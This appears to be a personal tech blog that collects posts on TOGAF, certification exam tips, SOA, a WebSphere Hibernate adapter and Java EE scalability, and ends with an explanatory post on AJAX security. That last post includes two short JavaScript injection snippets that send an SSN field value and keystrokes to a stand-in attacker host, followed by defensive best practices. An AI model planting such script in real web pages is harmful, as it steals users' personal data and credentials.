Gelling Security Architecture with TOGAF

This article describes how to adopt ADM cycle for enterprise security. Also it includes steps for development of security architecture and help enterprise to avoid missing a critical security concern. This article will not focusing on security architecture development methodology, but intended to touch point the security architecture task and role, as well as gelling of security objectives for each phase of the ADM. 


For more detail, click on http://www.articlesbase.com/information-technology-articles/gelling-security-architecture-with-togaf-5841146.html link.  

Preparing TOGAF 9 Certification

Last week, I cleared the TOGAF 9 part -2 so now I'm a TOGAF 9 Certified :-). Being into the consulting company, it took me around 6-7 months to clear the exam (both part 1 & 2) because of time constrain. Anyways, just sharing my experiences of exam:    


For Part 1: 

• Read the TOGAF 9 documentation
• Focus on input & output of each ADM Phases (specially Phase E & F)
• High level knowledge of steps involved in each ADM Phases
• Technical Reference Model
• Repository 

Part - 2 (though it's a open book) is bit tougher than Part - 1 as it is having scenario questions.  Below are topics/section which you should focus: 

• Read the TOGAF 9 documentation
• Focus on input & output of each ADM Phases 
• In-depth knowledge of steps involved in each ADM Phases
• Artifacts (catalog, matrices & diagrams) involved in each phases(specially B,C & D)
• Also read the mapping of security architecture with TOGAF
• Iterative processes & guidelines

Apart from above mentioned points, you can also view the Knotion TOGAF 9 series on YouTube and view other material available on net(togaf presentations etc) 

SOA with TOGAF

Many organizations are now facing challenges around keeping pace with current business trends and managing complex systems. So organization are looking for better business agility, better business automation, and better IT alignment to speed their business growth.

In most of the cases, SOA helps in simplifying the business and eases communication with different departments. It separates functions into distinct business services - units which can easily be accessible and reusable. SOA focuses on agility and flexibility. The point is to create services that are easily accessible across enterprise and can be consumed in different environments.

For more detail, please visit my published article on theserverside website.

Guide to clear SCEA (OCMJEA) Part 2 & 3

Moving forward from SCEA part - 1, for part 2 assignment, you need to cover following topics like:

1. what is the proposed architecture goals and constraints

2. section on use-case view

3. section on logical view of proposed architecture

4. section on technical view of proposed architecture - This is most important section as you need to cover sub-sections like layers of architecture, each use-case realization with class & sequence diagrams, development view of project including package hierarchy. Also cover the mentioned NFRs in the assignment.

5. section on deployment view

6. Assumption & Risk - This section is also important as you will going to list doing complete assumption made while designing the system. Also list down the risk like unavailability of application etc.

7. Optional, but you can add Annexure (s) depending upon your sections

For part 3, you need to answer with respect to NFRs (performance, security, availability etc) mentioned in the assignment. Explain each question with points rather than big paragraph.

WebSphere's DynaCache Hibernate Caching Adapter

As WebSphere Application Server (especially 6.x) onwards, it supports JPA (Java Persistence APIs). Its default ORM tool is OpenJPA. It also supports easy plugging with other ORM tools. For distributed caching, WAS (WebSphere? Application Server) uses DynaCache for distributed caching and very useful in clustered environment. As it has pluggable caching architecture so any ORM tool can easily gets plugged with the ORM caching adapter.

As Hibernate is very famous and stable ORM tool. But it has an issues with WAS as it doesn't have a Hibernate caching adapter to plug with IBM's distributed caching framework.

So I decided to make WebSphere-Hibernate DynaCache adapter so that anyone can easily use the renowned Hibernate ORM.

Please visit my project at http://code.google.com/p/webspherehibernateadapter/ for more detail.

High Scalable and Distributed Architecture

This article describes how to achieve high scalability with Java EE EJB 3.0 and Spring Framework. Also how this hybrid solution can be scalable in a cloud space.

In an Enterprise world, Spring Framework with some standard ORM tool like Hibernate gained considerable acceptance as a light-weight architecture for mid size applications. Also in Java EE 5 specification, major changes has been done on component architecture, tried overcome the gaps like IoC, ORM etc.

Concept of IoC is still immature in the Java EE 5 and the flexibility, AOP, and relative strengths of Spring and ORM tool like Hibernate to further improve the productivity and quality of any web based applications. As JPA (part of Java EE 5) specification suggest pluggable design so we can use any ORM tool (compatible of JPA) in any application server like IBM WebSphere uses Apache OpenJPA as a default provider but Hibernate can easily be pluggable.

This article demonstrates how to build a highly scalable application with hybrid technology like EJB 3.0, Spring 3.0.x, and Hibernate. Also Spring Framework has its own remoting APIs and options but EJB is a standard specification and can easily be migrated across the application servers.
By designing a flexible and component architecture, the application will use the power of EJB 3.0, IoC & APO of Spring 3.0.x and ORM capability of Hibernate.

For more detail, visit my published article on theserverside website.

Ajax and Web Application Security

Now a days, Ajax, meant for increase interactivity, application speed and usability; popularity becomes increasing because it internally uses "JavaScript" language which has a rich user

interface capability like dynamic form and its properties, pop-up controls, controls on information display, browser properties etc.

Ajax uses different web technologies like:

• HTML or XHTML: It provide standards for displaying content display
• Cascading Style Sheet (CSS): It also provide standards for displaying content display
• JavaScript: It is a scripting language used for client side browser based applications
• Document Object Model (DOM): It is a standard object model used for displaying dynamic content and related interaction.
• XML and XSLT: It has a capability to manipulate, exchange and transferred data between client and server.
• XML HTML Request (XMLHttpRequest): This client side JavaScript API used for HTTP connect to server and exchange information. Information can be plain text, XML or JSON.
• JavaScript Object Notation (JSON): It is a lightweight, text-based and language independent data exchange format between client and server.

How its Works

Below figure shows the flow of AJAX request:

• User generates an event or some asynchronous event fire at client end and result a JavaScript call
• XMLHttpRequest JavaScript object request is created and configured with a request parameter along with event component identifier and user defined values (if any).
• Above object makes a asynchronous call to web / application server. Call may be web-service, servlet, JSF's AJAX component etc.
• Based on request, server may fetch the desired data from data store.
• That data push back to client browser in form of plain text, XML or JSON.
• XMLHttpRequest callback method received the data, processes it and updated the HTTP DOM representing the web-page with new information.

AJAX Security and Vulnerabilities

As AJAX has good UI (usability) capabilities but it has some security holes which makes web application vulnerable. Vulnerability can be at sever side and client side. As information flow between server and client in form of plain text, XML or JSON which eventually exposing server-side APIs and if insufficient security at server-side leads to unauthenticated access of system. Also usage of AJAX increases the chance of session management vulnerabilities and risk of access hidden URLs which are necessary for AJAX request to be processes.

Another issue with AJAX is visible data. XMLHttpRequest sends the plain visible text to server and may easily reveal database fields like Product Id, Customer Id which can be easily be manipulated by the hacker.

a.Effects of Attack:

• Hacking Password and Cookies: Hacker can easily manipulate the sensitive information like password, cookies etc by injecting scripts in any part of DOM tree like:

function hackdata() {

var data = document.getElementById("ssn").value;

document.image[0].src = "http://hackdata.com/hackdata=" + data;

}

document.getElementById("button").onclick = hackdata;

Above example shows how hacker can steal the sensitive information.As soon as user clicks on submit button, a asynchronous request goes to hacker site with sensitive information. With the same approach, hacker can hack the cookies information.

• Hacking keyboard events: Through key logger or mouse sniffer sensitive information can be captured like:

function hackdata(e) {

document.image[0].src = "http://hackdata.com/keydata=" + e.keyCode;

}

document.body.addEventListener("keyup",hackdata,false);

Same way, mouse event can be steal through mouse sniffer.

• Inserting information: Attacker can modify the stylesheet to eliminate sensitive information such as making font color to white.

b.Best Practices:

Following are the best practices which need to be follow in AJAX based web application:

• Data Validation: To avoid XSS (Cross Site Scripting), web application must do the input data validation. Input validation and filter out possible active and malicious content from untrusted input source.
• Avoid Dynamic code generation & execution: Try to avoid dynamic code generation such as usage of eval method
• Secure use of JSON: As JSON is subset of JavaScript so it may contain malicious code such as many JavaScript libraries use the eval() method to convert JSON into JavaScript objects. To avoid that use the regular expression defined in RFC 4627 to make sure that JSON doesn't have malicious code.
• Use if "iFrame": Load the different domain data into iframe, which gives the advantage of JavaScript execution context & DOM tree its own. This prevents hacker from hacking from main page.
• Use security testing tool: Always use vulnerability checking tool to detect the potential vulnerabilities in advance.

Above are few best practices which needs to follow to avoid from common AJAX attacks.